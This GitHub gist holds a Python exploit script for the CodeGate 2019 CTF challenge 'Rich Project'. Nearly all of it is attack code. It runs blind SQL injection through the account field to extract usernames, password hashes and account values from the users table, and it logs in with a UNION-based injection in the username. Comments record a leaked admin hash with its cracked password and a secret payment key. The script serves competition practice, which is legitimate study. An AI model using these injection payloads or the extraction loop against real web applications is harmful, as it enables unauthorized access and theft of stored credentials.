Last active
August 17, 2019 19:28
-
-
Save stypr/727aab51302af884dc59e2b754c3eae4 to your computer and use it in GitHub Desktop.
CodeGate 2019: Rich Project exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import urllib2 | |
| import urllib | |
| import random | |
| import sys | |
| import time | |
| import hashlib | |
| def rand(sz=4): | |
| return str(random.randint(10**sz, 100**sz)) | |
| COOKIE = "PHPSESSID=styprisgood1234123401" + rand(5) | |
| def logout(): | |
| u = urllib2.Request("http://110.10.147.112/?p=logout") | |
| u.add_header("Cookie", COOKIE) | |
| r = urllib2.urlopen(u).read() | |
| return r | |
| def join(username, password, account): | |
| print(account) | |
| u = urllib2.Request("http://110.10.147.112/?p=reg") | |
| u.add_header("Cookie", COOKIE) | |
| d = urllib.urlencode({'id': username, 'pw': password, 'ac': account}) | |
| r = urllib2.urlopen(u, d).read() | |
| return r | |
| def info(): | |
| u = urllib2.Request("http://110.10.147.112/?p=info") | |
| u.add_header("Cookie", COOKIE) | |
| r = urllib2.urlopen(u).read() | |
| return r | |
| def pwn_mysql(blacklist): | |
| ''' leak credentials | |
| >>> pwn_mysql(['admin', 'stypr', 'lol']) | |
| ''' | |
| # db: userdata | |
| # user: db_manager | |
| # version: 5.7.25-0ubuntu | |
| find_out = ['id', 'pw', 'ac'] | |
| b = "" | |
| for i in blacklist: | |
| b += "0x" + i.encode('hex') | |
| b += "," | |
| b = b[:-1] | |
| blacklist = b | |
| leaked = [] | |
| q = 0 | |
| for k in find_out: | |
| d = "" | |
| for i in xrange(1, 256): | |
| logout() | |
| # admin: 4dcc4173d80a2817206e196a38f0dbf7850188ff : ADMIN_ACC0UNTS | |
| # cracked password = hacker | |
| """ D0_N0T_RE1E@5E_0THER5 on board.php """ | |
| # like_prefer: LIKE search, you can just put "admin".. | |
| like_prefer = "0x" + "%a_%".encode('hex') | |
| ''' use max(), case match, select distinct... to bypass `where` and `limit` phrase | |
| a = join('stypr' + rand(), 'stypr' + rand(), "' + (select ascii(right(left(max(y),%s),1)) from (select distinct (case when id not in (%s) and id like %s then %s else 1337 end) as y from users)x ))#" % (i,blacklist,like_prefer,find_out[q])) | |
| b = info() | |
| info_rec = b.split("AC :")[1].split("<br")[0].strip() | |
| tmp = chr(int(info_rec)) | |
| if d: | |
| if d[-1] == tmp: | |
| break | |
| d += tmp | |
| print(">>", d) | |
| leaked.append(d) | |
| q += 1 | |
| return leaked | |
| def login(username, password, account): | |
| u = urllib2.Request("http://110.10.147.112/?p=login") | |
| u.add_header("Cookie", COOKIE) | |
| d = urllib.urlencode({'id': username, 'pw': password, 'ac': account}) | |
| r = urllib2.urlopen(u, d).read() | |
| return r | |
| def reserv(timed, amount): | |
| code = "D0_N0T_RE1E@5E_0THER5" | |
| d = urllib.urlencode({'code': code, 'date': timed, 'amount': amount}) | |
| u = urllib2.Request("http://110.10.147.112/?p=reserv") | |
| u.add_header("Cookie", COOKIE) | |
| r = urllib2.urlopen(u, d).read() | |
| return r | |
| def pay(): | |
| u = urllib2.Request("http://110.10.147.112/?p=pay&key=D0_N0T_RE1E@5E_0THER5") | |
| u.add_header("Cookie", COOKIE) | |
| r = urllib2.urlopen(u).read() | |
| return r | |
| # robots.txt -> /top_secret.zip | |
| # pay.php --> check pw | |
| username = "0x" + "S'union select 1,9e99,3,4,5#".encode('hex') | |
| password = "0x" + hashlib.sha1("stypr_is_nope").hexdigest().encode('hex') | |
| #print join('s'+rand(), 'stypr_flag133713372', "t'),(%s,%s,1234)#" % (username,password,)) | |
| #login as S'union select 1,9e99,3,4,5# / stypr_is_nope / 1234 | |
| print login("S'union select 1,9e99,3,4,5#", "stypr_is_nope", "1234") | |
| print pay() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
you seem to be already stereotyped.